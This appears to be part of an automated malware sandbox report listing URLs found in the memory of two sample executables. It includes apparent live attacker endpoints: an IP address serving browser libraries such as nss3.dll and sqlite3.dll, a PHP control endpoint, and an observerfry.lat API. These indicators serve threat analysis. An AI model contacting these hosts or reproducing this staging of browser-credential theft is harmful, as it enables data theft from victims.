Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CA4000.00000040.00000001.01000000.00000009.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CEC000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001374000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllD
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001374000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.00000000013A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/?
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001374000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CA4000.00000040.00000001.01000000.00000009.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.000000000132E000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CEC000.00000040.00000001.01000000.00000009.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B96D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B96D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:F
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpI
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpU
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CEC000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpaf9748e8b0bdf623d35f52a86479nsion
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpe
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpgPreference.Verb
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CA4000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpser
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2484458829.0000000001389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/~
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CEC000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CA4000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206ocal
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000CA4000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.206ocalMicrosoft
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ElmEHL9kP9.exe, 00000000.00000003.1672988235.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1672046563.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftR#
Source: ElmEHL9kP9.exe, 00000000.00000003.1798133810.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1736083715.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1736205964.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1735852218.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftY
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://ocsp.digicert.com0
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2498637724.000000006D5AD000.00000002.00000001.01000000.0000000E.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2495807484.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2487917051.000000000580C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: ElmEHL9kP9.exe, 00000000.00000003.1621322960.000000000587B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: https://mozilla.org0/
Source: ElmEHL9kP9.exe, 00000000.00000003.1797950764.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/
Source: ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/6
Source: ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/AVd
Source: ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/P
Source: ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001104000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/Progr
Source: ElmEHL9kP9.exe, 00000000.00000003.1797950764.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/api
Source: ElmEHL9kP9.exe, 00000000.00000003.1798272326.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798380069.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1735852218.00000000010EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/api:
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798272326.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1798380069.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1671862770.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1646112524.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1646073174.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1735852218.00000000010EF000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1644858427.00000000010E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/apiifaf
Source: ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001104000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/apirs
Source: ElmEHL9kP9.exe, 00000000.00000003.1736083715.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1671963395.0000000001104000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1690040744.0000000001104000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/pi
Source: ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/q/
Source: ElmEHL9kP9.exe, 00000000.00000003.1644788411.0000000001104000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/x5g
Source: ElmEHL9kP9.exe, 00000000.00000003.1575470027.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat/~
Source: ElmEHL9kP9.exe, 00000000.00000003.1553639592.0000000001098000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat:443/api
Source: ElmEHL9kP9.exe, 00000000.00000003.1646189183.0000000001063000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://observerfry.lat:443/apicohortG
Source: GCFHDAKECFIDGDGDBKJDGIIIDB.6.dr String found in binary or memory: https://support.mozilla.org
Source: GCFHDAKECFIDGDGDBKJDGIIIDB.6.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ElmEHL9kP9.exe, 00000000.00000003.1622712096.00000000058F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GCFHDAKECFIDGDGDBKJDGIIIDB.6.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: ElmEHL9kP9.exe, 00000000.00000003.1576539528.0000000005809000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576462691.000000000580C000.00000004.00000800.00020000.00000000.sdmp, ElmEHL9kP9.exe, 00000000.00000003.1576651052.0000000005809000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000003.2091841171.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKE.6.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ElmEHL9kP9.exe, 00000000.00000003.1623083355.0000000005858000.00000004.00000800.00020000.00000000.sdmp, KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2491703927.000000000B961000.00000004.00000020.00020000.00000000.sdmp, KKKJEHCGCGDAAAKFHJKJ.6.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: GCFHDAKECFIDGDGDBKJDGIIIDB.6.dr String found in binary or memory: https://www.mozilla.org
